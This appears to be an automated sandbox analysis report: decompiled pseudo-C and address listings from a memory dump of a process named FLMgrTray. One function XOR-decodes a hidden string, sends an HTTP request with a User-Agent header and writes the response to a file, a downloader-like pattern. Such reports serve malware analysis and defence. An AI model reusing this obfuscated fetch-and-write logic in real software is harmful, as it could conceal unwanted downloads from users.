                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3660427363-0
                                                                                        • Opcode ID: cdf96880e4d3bbdabe528aa246f2b1f2ea689b184f2e418cd47b04ca018ae9ec
                                                                                        • Instruction ID: 3dc3b5334418a931106815ea8d6dce2cbcad6c7352a315cd6fe803314fa69545
                                                                                        • Opcode Fuzzy Hash: cdf96880e4d3bbdabe528aa246f2b1f2ea689b184f2e418cd47b04ca018ae9ec
                                                                                        • Instruction Fuzzy Hash: E5212CB5A0420D9FDF25CE58E941AAA77E9EB4A310F10496AFC09D7340D771DD209BB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 39%
                                                                                        			E00174E80(signed int __ecx, intOrPtr _a4) {
                                                                                        				void* _v16;
                                                                                        				int _v20;
                                                                                        				intOrPtr _v28;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				struct _IO_FILE* _v44;
                                                                                        				char _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				struct _IO_FILE* _v68;
                                                                                        				char _v84;
                                                                                        				intOrPtr _v88;
                                                                                        				struct _IO_FILE* _v92;
                                                                                        				char _v108;
                                                                                        				signed int _v144;
                                                                                        				intOrPtr _v200;
                                                                                        				intOrPtr _v204;
                                                                                        				char _v220;
                                                                                        				char _v224;
                                                                                        				char _v344;
                                                                                        				char _v345;
                                                                                        				intOrPtr _v348;
                                                                                        				struct _IO_FILE* _v352;
                                                                                        				struct _IO_FILE* _v356;
                                                                                        				void* _v360;
                                                                                        				struct _IO_FILE* _v368;
                                                                                        				struct _IO_FILE* _v372;
                                                                                        				void* _v376;
                                                                                        				intOrPtr _v380;
                                                                                        				intOrPtr _v384;
                                                                                        				intOrPtr _v388;
                                                                                        				char _v408;
                                                                                        				struct _IO_FILE* _v420;
                                                                                        				char _v424;
                                                                                        				unsigned int _v432;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t127;
                                                                                        				signed int _t128;
                                                                                        				void* _t132;
                                                                                        				signed int _t143;
                                                                                        				void* _t148;
                                                                                        				struct _IO_FILE* _t179;
                                                                                        				intOrPtr _t183;
                                                                                        				intOrPtr _t186;
                                                                                        				signed int _t192;
                                                                                        				signed int _t194;
                                                                                        				void* _t196;
                                                                                        				signed int _t198;
                                                                                        				signed int _t200;
                                                                                        				signed int _t202;
                                                                                        				void* _t206;
                                                                                        				signed int _t211;
                                                                                        				intOrPtr* _t213;
                                                                                        				intOrPtr _t238;
                                                                                        				char _t239;
                                                                                        				signed int _t241;
                                                                                        				unsigned int _t246;
                                                                                        				intOrPtr _t247;
                                                                                        				intOrPtr _t248;
                                                                                        				void* _t249;
                                                                                        				void* _t250;
                                                                                        				intOrPtr _t252;
                                                                                        				void* _t258;
                                                                                        				char _t266;
                                                                                        				intOrPtr _t268;
                                                                                        				int _t272;
                                                                                        				void* _t277;
                                                                                        				signed int _t279;
                                                                                        				void* _t284;
                                                                                        				signed int _t287;
                                                                                        				void* _t289;
                                                                                        				void* _t290;
                                                                                        				void* _t293;
                                                                                        
                                                                                        				_t277 = _t284;
                                                                                        				_t263 = __ecx;
                                                                                        				_t252 = _a4;
                                                                                        				 *__ecx = 0;
                                                                                        				 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                        				 *((intOrPtr*)(__ecx + 8)) = 0;
                                                                                        				if(_t252 != 0) {
                                                                                        					__eflags = _t252 - 0x7fffffff;
                                                                                        					if(_t252 > 0x7fffffff) {
                                                                                        						E00164D00(__ecx);
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						_t206 = _t284;
                                                                                        						_t287 = (_t284 - 0x00000008 & 0xfffffff0) + 4;
                                                                                        						_push(_t277);
                                                                                        						 *((intOrPtr*)(_t287 + 4)) =  *((intOrPtr*)(_t206 + 4));
                                                                                        						_t279 = _t287;
                                                                                        						_push(0xffffffff);
                                                                                        						_push(E0018DA7F);
                                                                                        						_push( *[fs:0x0]);
                                                                                        						_push(_t206);
                                                                                        						_t127 =  *0x19d05c; // 0x2c80d730
                                                                                        						_t128 = _t127 ^ _t279;
                                                                                        						_v32 = _t128;
                                                                                        						_push(__ecx);
                                                                                        						_push(_t252);
                                                                                        						_push(_t128);
                                                                                        						 *[fs:0x0] = _t279 - 0xc;
                                                                                        						_v348 =  *((intOrPtr*)(_t206 + 8));
                                                                                        						_t132 = memcpy(_t279 - 0x148, 0x190348, 0x1d << 2);
                                                                                        						_t289 = _t287 - 0x198 + 0xc;
                                                                                        						asm("xorps xmm0, xmm0");
                                                                                        						_v376 = _t132;
                                                                                        						_t211 = 0;
                                                                                        						asm("movlpd [ebp-0x168], xmm0");
                                                                                        						__eflags =  *0x19dc40 - 2;
                                                                                        						if( *0x19dc40 < 2) {
                                                                                        							L13:
                                                                                        							_t245 = (_t211 + (0xa0a0a0a1 * _t211 >> 0x20) >> 5 >> 0x1f) + (_t211 + (0xa0a0a0a1 * _t211 >> 0x20) >> 5);
                                                                                        							 *(_t279 + _t211 - 0x148) =  *(_t279 + _t211 - 0x148) ^ 0x33 + _t211;
                                                                                        							_t211 = _t211 + 1;
                                                                                        							__eflags = _t211 - 0x74;
                                                                                        						} else {
                                                                                        							asm("movaps xmm0, [0x190d20]");
                                                                                        							asm("movaps xmm4, [0x18ffd0]");
                                                                                        							asm("movaps xmm3, [0x190d30]");
                                                                                        							asm("movaps xmm6, [0x190d00]");
                                                                                        							asm("movd xmm5, eax");
                                                                                        							asm("movaps [ebp-0x1a0], xmm0");
                                                                                        							_t245 = _v432;
                                                                                        							asm("movd xmm7, eax");
                                                                                        							asm("o16 nop [eax+eax]");
                                                                                        							do {
                                                                                        								asm("movd xmm0, ecx");
                                                                                        								asm("pshufd xmm2, xmm0, 0x0");
                                                                                        								asm("paddd xmm2, xmm4");
                                                                                        								asm("movaps xmm1, xmm2");
                                                                                        								asm("movaps xmm0, xmm2");
                                                                                        								asm("punpckhdq xmm0, xmm2");
                                                                                        								asm("punpckldq xmm1, xmm2");
                                                                                        								asm("pmuldq xmm0, xmm3");
                                                                                        								asm("pmuldq xmm1, xmm3");
                                                                                        								asm("shufps xmm1, xmm0, 0xdd");
                                                                                        								asm("paddd xmm1, xmm2");
                                                                                        								asm("psrad xmm1, xmm5");
                                                                                        								asm("movaps xmm0, xmm1");
                                                                                        								asm("psrld xmm0, xmm7");
                                                                                        								asm("paddd xmm0, xmm1");
                                                                                        								asm("pmulld xmm0, xmm6");
                                                                                        								asm("psubd xmm2, xmm0");
                                                                                        								asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        								asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        								asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        								asm("pand xmm1, [0x190d10]");
                                                                                        								asm("packuswb xmm1, xmm1");
                                                                                        								asm("movd xmm0, edx");
                                                                                        								asm("paddb xmm1, xmm0");
                                                                                        								asm("movd xmm0, dword [ebp+ecx-0x148]");
                                                                                        								asm("pxor xmm1, xmm0");
                                                                                        								asm("movd xmm0, eax");
                                                                                        								asm("pshufd xmm2, xmm0, 0x0");
                                                                                        								asm("movd [ebp+ecx-0x148], xmm1");
                                                                                        								asm("paddd xmm2, xmm4");
                                                                                        								asm("movaps xmm1, xmm2");
                                                                                        								asm("movaps xmm0, xmm2");
                                                                                        								asm("punpckldq xmm1, xmm2");
                                                                                        								asm("punpckhdq xmm0, xmm2");
                                                                                        								asm("pmuldq xmm0, xmm3");
                                                                                        								asm("pmuldq xmm1, xmm3");
                                                                                        								asm("shufps xmm1, xmm0, 0xdd");
                                                                                        								asm("paddd xmm1, xmm2");
                                                                                        								asm("psrad xmm1, xmm5");
                                                                                        								asm("movaps xmm0, xmm1");
                                                                                        								asm("psrld xmm0, xmm7");
                                                                                        								asm("paddd xmm0, xmm1");
                                                                                        								asm("pmulld xmm0, xmm6");
                                                                                        								asm("psubd xmm2, xmm0");
                                                                                        								asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        								asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        								asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        								asm("pand xmm1, [0x190d10]");
                                                                                        								asm("packuswb xmm1, xmm1");
                                                                                        								asm("movd xmm0, edx");
                                                                                        								asm("paddb xmm1, xmm0");
                                                                                        								asm("movd xmm0, dword [ebp+ecx-0x144]");
                                                                                        								asm("pxor xmm1, xmm0");
                                                                                        								asm("movd [ebp+ecx-0x144], xmm1");
                                                                                        								_t211 = _t211 + 8;
                                                                                        								__eflags = _t211 - 0x70;
                                                                                        							} while (_t211 < 0x70);
                                                                                        							__eflags = _t211 - 0x74;
                                                                                        							while(_t211 < 0x74) {
                                                                                        								goto L13;
                                                                                        							}
                                                                                        						}
                                                                                        						_v92 = 0;
                                                                                        						_v88 = 0xf;
                                                                                        						_v108 = 0;
                                                                                        						E00163450(_t206, _t245, 0x190382, "User-Agent", 0xa);
                                                                                        						_t213 =  &_v344;
                                                                                        						_v20 = 0;
                                                                                        						_v68 = 0;
                                                                                        						_t246 = _t213 + 1;
                                                                                        						_v64 = 0xf;
                                                                                        						_v84 = 0;
                                                                                        						do {
                                                                                        							_t143 =  *_t213;
                                                                                        							_t213 = _t213 + 1;
                                                                                        							__eflags = _t143;
                                                                                        						} while (_t143 != 0);
                                                                                        						E00163450(_t206, _t246, 0x190382,  &_v344, _t213 - _t246);
                                                                                        						_v20 = 1;
                                                                                        						_v384 = E0016C460( &_v360,  &_v108,  &_v60);
                                                                                        						_v20 = 2;
                                                                                        						_t148 = E001622D0( &_v60, _v352);
                                                                                        						_v424 = _v376;
                                                                                        						_v420 = _v372;
                                                                                        						_v20 = 3;
                                                                                        						_t256 = E00168500( &_v345, 0);
                                                                                        						E00166E10(_t206, _t149, __eflags);
                                                                                        						_v20 = 4;
                                                                                        						E00167650( &_v352, _t148);
                                                                                        						E00167640(_t206,  &_v352, _v384);
                                                                                        						E00167680( &_v352,  &_v424);
                                                                                        						E001676B0( &_v352, _t149);
                                                                                        						E001672B0( &_v352,  &_v224);
                                                                                        						E00167290(_t206,  &_v352, _t149);
                                                                                        						_t247 = _v40;
                                                                                        						_v20 = 6;
                                                                                        						__eflags = _t247 - 0x10;
                                                                                        						if(_t247 >= 0x10) {
                                                                                        							_t239 = _v60;
                                                                                        							_t250 = _t247 + 1;
                                                                                        							_t186 = _t239;
                                                                                        							__eflags = _t250 - 0x1000;
                                                                                        							if(_t250 >= 0x1000) {
                                                                                        								_t239 =  *((intOrPtr*)(_t239 - 4));
                                                                                        								_t250 = _t250 + 0x23;
                                                                                        								_t186 = _t186 - _t239 + 0xfffffffc;
                                                                                        								__eflags = _t186 - 0x1f;
                                                                                        								if(_t186 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t250);
                                                                                        							E00175733(_t186, _t239);
                                                                                        							_t289 = _t289 + 8;
                                                                                        						}
                                                                                        						_v44 = 0;
                                                                                        						_v40 = 0xf;
                                                                                        						_v60 = 0;
                                                                                        						_t266 = _v360;
                                                                                        						_v20 = 8;
                                                                                        						E00167760(_t206,  &_v360, _t256, _t266,  *((intOrPtr*)(_t266 + 4)));
                                                                                        						_push(0x40);
                                                                                        						 *((intOrPtr*)(_v360 + 4)) = _t266;
                                                                                        						 *_v360 = _t266;
                                                                                        						 *((intOrPtr*)(_v360 + 8)) = _t266;
                                                                                        						_v356 = 0;
                                                                                        						E00175733(_v360, _v360);
                                                                                        						_t290 = _t289 + 8;
                                                                                        						_push(E00165430);
                                                                                        						_push(1);
                                                                                        						_push(0x30);
                                                                                        						_v20 = 9;
                                                                                        						_push( &_v108);
                                                                                        						E00175605();
                                                                                        						__eflags = _v144;
                                                                                        						if(_v144 != 0) {
                                                                                        							L32:
                                                                                        							_v345 = 0;
                                                                                        						} else {
                                                                                        							__eflags = _v224 + 0xffffff38 - 6;
                                                                                        							if(_v224 + 0xffffff38 > 6) {
                                                                                        								goto L32;
                                                                                        							} else {
                                                                                        								_t268 = _v204;
                                                                                        								__eflags = _t268 - 0x80;
                                                                                        								if(_t268 <= 0x80) {
                                                                                        									goto L32;
                                                                                        								} else {
                                                                                        									__eflags = _v200 - 0x10;
                                                                                        									_t172 =  >=  ? _v220 :  &_v220;
                                                                                        									_t173 = ( >=  ? _v220 :  &_v220) + _t268;
                                                                                        									_v376 = 0;
                                                                                        									__eflags = _v200 - 0x10;
                                                                                        									_t270 =  >=  ? _v220 :  &_v220;
                                                                                        									_v372 = 0;
                                                                                        									_v368 = 0;
                                                                                        									E0016C360( &_v376, _v200 - 0x10,  >=  ? _v220 :  &_v220, ( >=  ? _v220 :  &_v220) + _t268);
                                                                                        									_t258 = _v376;
                                                                                        									_t272 = _v372 - _t258;
                                                                                        									_v20 = 0xa;
                                                                                        									E001622D0( &_v408, _v380);
                                                                                        									__eflags = _v388 - 0x10;
                                                                                        									_t177 =  >=  ? _v408 :  &_v408;
                                                                                        									_v352 = 0;
                                                                                        									__imp__fopen_s( &_v352,  >=  ? _v408 :  &_v408, 0x190344, _v380);
                                                                                        									_t179 = _v352;
                                                                                        									_t293 = _t290 + 0xc;
                                                                                        									__eflags = _t179;
                                                                                        									if(_t179 != 0) {
                                                                                        										L29:
                                                                                        										fwrite(_t258, 1, _t272, _t179);
                                                                                        										fclose(_v352);
                                                                                        										_t293 = _t293 + 0x14;
                                                                                        									}
                                                                                        									_t248 = _v388;
                                                                                        									__eflags = _t248 - 0x10;
                                                                                        									if(_t248 >= 0x10) {
                                                                                        										_t238 = _v408;
                                                                                        										_t249 = _t248 + 1;
                                                                                        										_t183 = _t238;
                                                                                        										__eflags = _t249 - 0x1000;
                                                                                        										if(_t249 < 0x1000) {
                                                                                        											L30:
                                                                                        											_push(_t249);
                                                                                        											E00175733(_t183, _t238);
                                                                                        										} else {
                                                                                        											_t238 =  *((intOrPtr*)(_t238 - 4));
                                                                                        											_t249 = _t249 + 0x23;
                                                                                        											_t183 = _t183 - _t238 + 0xfffffffc;
                                                                                        											__eflags = _t183 - 0x1f;
                                                                                        											if(_t183 <= 0x1f) {
                                                                                        												goto L30;
                                                                                        											} else {
                                                                                        												__imp___invalid_parameter_noinfo_noreturn();
                                                                                        												goto L29;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									E0016C650(_t206,  &_v376);
                                                                                        									_v345 = 1;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						E0016C920(_t206,  &_v224);
                                                                                        						 *[fs:0x0] = _v28;
                                                                                        						__eflags = _v36 ^ _t279;
                                                                                        						return E001755F4(_v36 ^ _t279);
                                                                                        					} else {
                                                                                        						__eflags = _t252 - 0x1000;
                                                                                        						if(_t252 < 0x1000) {
                                                                                        							L7:
                                                                                        							_push(_t252);
                                                                                        							_t192 = E00175703();
                                                                                        							 *_t263 = _t192;
                                                                                        							_t263[1] = _t192;
                                                                                        							_t194 =  *_t263 + _t252;
                                                                                        							__eflags = _t194;
                                                                                        							_t263[2] = _t194;
                                                                                        							return 1;
                                                                                        						} else {
                                                                                        							_t196 = _t252 + 0x23;
                                                                                        							__eflags = _t196 - _t252;
                                                                                        							_t197 =  <=  ? __ecx | 0xffffffff : _t196;
                                                                                        							_push( <=  ? __ecx | 0xffffffff : _t196); // executed
                                                                                        							_t198 = E00175703(); // executed
                                                                                        							_t241 = _t198;
                                                                                        							_t284 = _t284 + 4;
                                                                                        							__eflags = _t241;
                                                                                        							if(_t241 == 0) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								goto L7;
                                                                                        							} else {
                                                                                        								_t5 = _t241 + 0x23; // 0x23
                                                                                        								_t200 = _t5 & 0xffffffe0;
                                                                                        								 *(_t200 - 4) = _t241;
                                                                                        								 *_t263 = _t200;
                                                                                        								_t263[1] = _t200;
                                                                                        								_t202 =  *_t263 + _t252;
                                                                                        								__eflags = _t202;
                                                                                        								_t263[2] = _t202;
                                                                                        								return 1;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}















































































                                                                                        0x00174e81
                                                                                        0x00174e84
                                                                                        0x00174e87
                                                                                        0x00174e8a
                                                                                        0x00174e90
                                                                                        0x00174e97
                                                                                        0x00174ea0
                                                                                        0x00174eaa
                                                                                        0x00174eb0
                                                                                        0x00174f14
                                                                                        0x00174f19
                                                                                        0x00174f1a
                                                                                        0x00174f1b
                                                                                        0x00174f1c
                                                                                        0x00174f1d
                                                                                        0x00174f1e
                                                                                        0x00174f1f
                                                                                        0x00174f21
                                                                                        0x00174f29
                                                                                        0x00174f2c
                                                                                        0x00174f30
                                                                                        0x00174f34
                                                                                        0x00174f36
                                                                                        0x00174f38
                                                                                        0x00174f43
                                                                                        0x00174f44
                                                                                        0x00174f4b
                                                                                        0x00174f50
                                                                                        0x00174f52
                                                                                        0x00174f55
                                                                                        0x00174f56
                                                                                        0x00174f57
                                                                                        0x00174f5b
                                                                                        0x00174f6f
                                                                                        0x00174f7d
                                                                                        0x00174f7d
                                                                                        0x00174f7f
                                                                                        0x00174f82
                                                                                        0x00174f88
                                                                                        0x00174f8a
                                                                                        0x00174f92
                                                                                        0x00174f99
                                                                                        0x001750f0
                                                                                        0x00175102
                                                                                        0x00175110
                                                                                        0x00175117
                                                                                        0x00175118
                                                                                        0x00174f9f
                                                                                        0x00174f9f
                                                                                        0x00174fab
                                                                                        0x00174fb2
                                                                                        0x00174fb9
                                                                                        0x00174fc0
                                                                                        0x00174fc9
                                                                                        0x00174fd0
                                                                                        0x00174fd6
                                                                                        0x00174fda
                                                                                        0x00174fe0
                                                                                        0x00174fe0
                                                                                        0x00174fe7
                                                                                        0x00174fec
                                                                                        0x00174ff0
                                                                                        0x00174ff3
                                                                                        0x00174ff6
                                                                                        0x00174ffa
                                                                                        0x00174ffe
                                                                                        0x00175003
                                                                                        0x00175008
                                                                                        0x0017500c
                                                                                        0x00175010
                                                                                        0x00175014
                                                                                        0x00175017
                                                                                        0x0017501b
                                                                                        0x0017501f
                                                                                        0x00175024
                                                                                        0x00175028
                                                                                        0x0017502d
                                                                                        0x00175032
                                                                                        0x00175037
                                                                                        0x0017503f
                                                                                        0x00175043
                                                                                        0x00175047
                                                                                        0x0017504b
                                                                                        0x00175054
                                                                                        0x00175058
                                                                                        0x0017505c
                                                                                        0x00175061
                                                                                        0x0017506a
                                                                                        0x0017506e
                                                                                        0x00175071
                                                                                        0x00175074
                                                                                        0x00175078
                                                                                        0x0017507c
                                                                                        0x00175081
                                                                                        0x00175086
                                                                                        0x0017508a
                                                                                        0x0017508e
                                                                                        0x00175092
                                                                                        0x00175095
                                                                                        0x00175099
                                                                                        0x0017509d
                                                                                        0x001750a2
                                                                                        0x001750a6
                                                                                        0x001750ab
                                                                                        0x001750b0
                                                                                        0x001750b5
                                                                                        0x001750bd
                                                                                        0x001750c1
                                                                                        0x001750c5
                                                                                        0x001750c9
                                                                                        0x001750d2
                                                                                        0x001750d6
                                                                                        0x001750df
                                                                                        0x001750e2
                                                                                        0x001750e2
                                                                                        0x001750eb
                                                                                        0x001750ee
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001750ee
                                                                                        0x00175127
                                                                                        0x0017512e
                                                                                        0x00175135
                                                                                        0x00175139
                                                                                        0x0017513e
                                                                                        0x00175144
                                                                                        0x0017514b
                                                                                        0x00175152
                                                                                        0x00175155
                                                                                        0x0017515c
                                                                                        0x00175160
                                                                                        0x00175160
                                                                                        0x00175162
                                                                                        0x00175163
                                                                                        0x00175163
                                                                                        0x00175174
                                                                                        0x0017517c
                                                                                        0x00175193
                                                                                        0x001751a2
                                                                                        0x001751a6
                                                                                        0x001751b3
                                                                                        0x001751bf
                                                                                        0x001751cd
                                                                                        0x001751dc
                                                                                        0x001751de
                                                                                        0x001751ea
                                                                                        0x001751ee
                                                                                        0x001751ff
                                                                                        0x00175211
                                                                                        0x0017521d
                                                                                        0x0017522f
                                                                                        0x0017523a
                                                                                        0x0017523f
                                                                                        0x00175242
                                                                                        0x00175246
                                                                                        0x00175249
                                                                                        0x0017524b
                                                                                        0x0017524e
                                                                                        0x0017524f
                                                                                        0x00175251
                                                                                        0x00175257
                                                                                        0x00175259
                                                                                        0x0017525c
                                                                                        0x00175261
                                                                                        0x00175264
                                                                                        0x00175267
                                                                                        0x00175269
                                                                                        0x00175269
                                                                                        0x00175267
                                                                                        0x0017526f
                                                                                        0x00175271
                                                                                        0x00175276
                                                                                        0x00175276
                                                                                        0x00175279
                                                                                        0x00175280
                                                                                        0x00175287
                                                                                        0x0017528b
                                                                                        0x00175297
                                                                                        0x0017529e
                                                                                        0x001752a9
                                                                                        0x001752ab
                                                                                        0x001752b4
                                                                                        0x001752bc
                                                                                        0x001752c5
                                                                                        0x001752cf
                                                                                        0x001752d4
                                                                                        0x001752d7
                                                                                        0x001752dc
                                                                                        0x001752de
                                                                                        0x001752e3
                                                                                        0x001752e7
                                                                                        0x001752e8
                                                                                        0x001752ed
                                                                                        0x001752f1
                                                                                        0x00175445
                                                                                        0x00175445
                                                                                        0x001752f7
                                                                                        0x00175302
                                                                                        0x00175305
                                                                                        0x00000000
                                                                                        0x0017530b
                                                                                        0x0017530b
                                                                                        0x00175311
                                                                                        0x00175317
                                                                                        0x00000000
                                                                                        0x0017531d
                                                                                        0x0017531d
                                                                                        0x00175330
                                                                                        0x0017533d
                                                                                        0x0017533f
                                                                                        0x00175349
                                                                                        0x00175357
                                                                                        0x0017535f
                                                                                        0x00175369
                                                                                        0x00175373
                                                                                        0x0017538a
                                                                                        0x00175390
                                                                                        0x00175392
                                                                                        0x00175396
                                                                                        0x0017539b
                                                                                        0x001753ad
                                                                                        0x001753bb
                                                                                        0x001753c6
                                                                                        0x001753cc
                                                                                        0x001753d2
                                                                                        0x001753d5
                                                                                        0x001753d7
                                                                                        0x0017540b
                                                                                        0x00175410
                                                                                        0x0017541c
                                                                                        0x00175422
                                                                                        0x00175422
                                                                                        0x001753d9
                                                                                        0x001753df
                                                                                        0x001753e2
                                                                                        0x001753e4
                                                                                        0x001753ea
                                                                                        0x001753eb
                                                                                        0x001753ed
                                                                                        0x001753f3
                                                                                        0x00175427
                                                                                        0x00175427
                                                                                        0x00175429
                                                                                        0x001753f5
                                                                                        0x001753f5
                                                                                        0x001753f8
                                                                                        0x001753fd
                                                                                        0x00175400
                                                                                        0x00175403
                                                                                        0x00000000
                                                                                        0x00175405
                                                                                        0x00175405
                                                                                        0x00000000
                                                                                        0x00175405
                                                                                        0x00175403
                                                                                        0x001753f3
                                                                                        0x00175437
                                                                                        0x0017543c
                                                                                        0x0017543c
                                                                                        0x00175317
                                                                                        0x00175305
                                                                                        0x00175452
                                                                                        0x00175460
                                                                                        0x0017546d
                                                                                        0x0017547a
                                                                                        0x00174eb2
                                                                                        0x00174eb2
                                                                                        0x00174eb8
                                                                                        0x00174ef7
                                                                                        0x00174ef7
                                                                                        0x00174ef8
                                                                                        0x00174efd
                                                                                        0x00174f02
                                                                                        0x00174f07
                                                                                        0x00174f07
                                                                                        0x00174f09
                                                                                        0x00174f11
                                                                                        0x00174eba
                                                                                        0x00174eba
                                                                                        0x00174ec0
                                                                                        0x00174ec2
                                                                                        0x00174ec5
                                                                                        0x00174ec6
                                                                                        0x00174ecb
                                                                                        0x00174ecd
                                                                                        0x00174ed0
                                                                                        0x00174ed2
                                                                                        0x00174ef1
                                                                                        0x00000000
                                                                                        0x00174ed4
                                                                                        0x00174ed4
                                                                                        0x00174ed7
                                                                                        0x00174eda
                                                                                        0x00174edd
                                                                                        0x00174edf
                                                                                        0x00174ee4
                                                                                        0x00174ee4
                                                                                        0x00174ee6
                                                                                        0x00174eee
                                                                                        0x00174eee
                                                                                        0x00174ed2
                                                                                        0x00174eb8
                                                                                        0x00174ea2
                                                                                        0x00174ea7
                                                                                        0x00174ea7

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e257c86a9631457be9272ff819e62394122b4d2295a79ab69dc970dc43667feb
                                                                                        • Instruction ID: c596eaa4d26e8f72f60eb1e489078413c56d2af3aceca3c762f143119b2dfc1b
                                                                                        • Opcode Fuzzy Hash: e257c86a9631457be9272ff819e62394122b4d2295a79ab69dc970dc43667feb
                                                                                        • Instruction Fuzzy Hash: 6511C2726006008FC720DF6DE84179AF7E4EFA4370B10853FE1ADC7690E7B4A8918791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 26%
                                                                                        			E00183BA0(void* __ebx, void* __edi, void* __eflags, char* _a4, char _a8, intOrPtr _a28) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				char* _v28;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t17;
                                                                                        				intOrPtr _t25;
                                                                                        				intOrPtr _t35;
                                                                                        				void* _t36;
                                                                                        				char* _t39;
                                                                                        				signed int _t41;
                                                                                        				void* _t42;
                                                                                        				void* _t47;
                                                                                        
                                                                                        				_t47 = __eflags;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E5B1);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t17 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v20 = _t17 ^ _t41;
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t39 = _a4;
                                                                                        				_v28 = _t39;
                                                                                        				_v24 = 0;
                                                                                        				 *((intOrPtr*)(_t39 + 0x10)) = 0;
                                                                                        				 *((intOrPtr*)(_t39 + 0x14)) = 0xf;
                                                                                        				_v8 = 1;
                                                                                        				 *_t39 = 0;
                                                                                        				_v24 = 1;
                                                                                        				E001622D0(_t42 - 0xfffffffffffffff8,  &_a8); // executed
                                                                                        				E00183D80(__ebx, __edi, _t39, _t47, _t39, _t17 ^ _t41); // executed
                                                                                        				_t35 = _a28;
                                                                                        				if(_t35 >= 0x10) {
                                                                                        					_t34 = _a8;
                                                                                        					_t36 = _t35 + 1;
                                                                                        					_t25 = _t34;
                                                                                        					if(_t36 >= 0x1000) {
                                                                                        						_t13 = _t34 - 4; // 0x14ffc
                                                                                        						_t34 =  *_t13;
                                                                                        						_t36 = _t36 + 0x23;
                                                                                        						if(_t25 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t36);
                                                                                        					E00175733(_t25, _t34);
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t41);
                                                                                        			}


















                                                                                        0x00183ba0
                                                                                        0x00183ba3
                                                                                        0x00183ba5
                                                                                        0x00183bb0
                                                                                        0x00183bb4
                                                                                        0x00183bbb
                                                                                        0x00183bc3
                                                                                        0x00183bc9
                                                                                        0x00183bcc
                                                                                        0x00183bcf
                                                                                        0x00183bd6
                                                                                        0x00183bdd
                                                                                        0x00183be4
                                                                                        0x00183beb
                                                                                        0x00183bf2
                                                                                        0x00183bff
                                                                                        0x00183c04
                                                                                        0x00183c09
                                                                                        0x00183c12
                                                                                        0x00183c14
                                                                                        0x00183c17
                                                                                        0x00183c18
                                                                                        0x00183c20
                                                                                        0x00183c22
                                                                                        0x00183c22
                                                                                        0x00183c25
                                                                                        0x00183c30
                                                                                        0x00183c32
                                                                                        0x00183c32
                                                                                        0x00183c30
                                                                                        0x00183c38
                                                                                        0x00183c3a
                                                                                        0x00183c3f
                                                                                        0x00183c47
                                                                                        0x00183c5d

                                                                                        APIs
                                                                                          • Part of subcall function 00183D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000000,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00183E3B
                                                                                          • Part of subcall function 00183D80: memmove.VCRUNTIME140(00000000,?,00000000,?,00000400,00000000,?), ref: 00183EBC
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0016EBA4,?), ref: 00183C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
